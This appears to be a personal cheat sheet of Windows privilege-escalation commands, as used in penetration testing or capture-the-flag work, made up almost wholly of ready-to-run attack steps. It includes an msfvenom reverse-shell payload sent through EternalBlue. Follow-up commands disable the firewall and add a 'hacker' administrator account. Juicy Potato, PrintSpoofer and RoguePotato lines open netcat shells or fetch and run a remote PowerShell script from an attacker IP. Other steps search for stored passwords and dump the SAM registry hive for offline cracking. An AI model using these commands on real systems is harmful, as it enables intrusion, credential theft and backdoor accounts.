PE Scripts

> import-module .\Sherlock.ps1
> Find-AllVulns
> powershell -ExecutionPolicy Bypass -command "& { . .\Sherlock.ps1; Find-AllVulns }"

Enum

  • Find writable folders
> dir /b /s /a:D
  • Password search
# reg pass search
> reg query HKLM /f pass /t REG_SZ /s

# search dir
> dir *.dbx /s (Emails)

# search passwords
> findstr /si password *.xml *.ini *.txt (Find passwords)
  • Char limit: dir /x shows the directory in old notation. Then, get the file using the following
> get \PROGRA~1\MICROS~1\MSSQL1~1.SQL\MSSQL\Backup\master.mdf

EternalBlue

> msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 --platform windows -a x86 -f exe -o windows_x86_shell_reverse_tcp.exe
> python send_and_execute.py <ip> shellcode/windows_x86_shell_reverse_tcp.exe
# disbale firewall
> service_exec(conn, r'cmd /c netsh firewall set opmode disable')
> service_exec(conn, r'cmd /c net user hacker pass123 /add')
> service_exec(conn, r'cmd /c net localgroup administrators hacker /add')

Folder permissions

# check what services can be accessed by the current user
> accesschk.exe /accepteula -uwcqv "Authenticated Users" *

# check folder permission
> icacls "C:\Program Files (x86)\hide.me VPN"

Juicy Potato

> JuicyPotato.exe -l 4444 -p C:\Users\jill\Desktop\nc.exe -a "<ip> 4444 -e cmd.exe" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
> PrintSpoofer32.exe -i -c cmd
> PrintSpoofer32.exe -c "nc.exe <ip> 4444 -e cmd"

Kernel Exploits

Patches

  • Check patches
> wmic qfe list

# Known exploits
KB4540673: SMBGhost, port 445, https://github.com/danigargu/CVE-2020-0796

RoguePotato

> .\RoguePotato.exe -c "{B91D5831-B1BD-4608-8198-D72E155020F7}" -r <ip> -e "powershell -c iex( iwr http://<ip>/shell.ps1 -UseBasicParsing )" -l 9000

SAM offline cracking

> reg save HKLM\SYSTEM system.save
> reg save HKLM\SAM sam.save
> reg save HKLM\SECURITY security.save
> get system.save
> get sam.save
> get security.save
> del /f system.save
> del /f sam.save
> del /f security.save

Services/Scheduled tasks

# Show all services
> sc query type= service state= all

# powershell
> Get-Service
> Get-ScheduledTask

# Get all scheduled tasks
> schtasks
> schtasks /query /fo LIST /v

# auto start services
> wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

spoolsv

Windows Server Version 2004
Windows Server Version 2008
Windows Server Version 2008R2
Windows Server Version 2012
Windows Server Version 2012R2
Windows Server 2016
Windows Server 2019
Windows Server 20H2
Windows 7
Windows 8.1
Windows 10

User privileges

> whoami /priv

WSUS attack

icacls ref

  1. A sequence of simple rights: F (full access) M (modify access) RX (read and execute access) R (read-only access) W (write-only access)
  2. A comma-separated list in parenthesis of specific rights: D (delete) RC (read control) WDAC (write DAC) WO (write owner) S (synchronize) AS (access system security) MA (maximum allowed) GR (generic read) GW (generic write) GE (generic execute) GA (generic all) RD (read data/list directory) WD (write data/add file) AD (append data/add subdirectory) REA (read extended attributes) WEA (write extended attributes) X (execute/traverse) DC (delete child) RA (read attributes) WA (write attributes)
  3. Inheritance rights may precede either Perm form, and they are applied only to directories: (OI): object inherit (CI): container inherit (IO): inherit only (NP): do not propagate inherit (I): permission inherited from parent container

portable py3

https://winpython.github.io/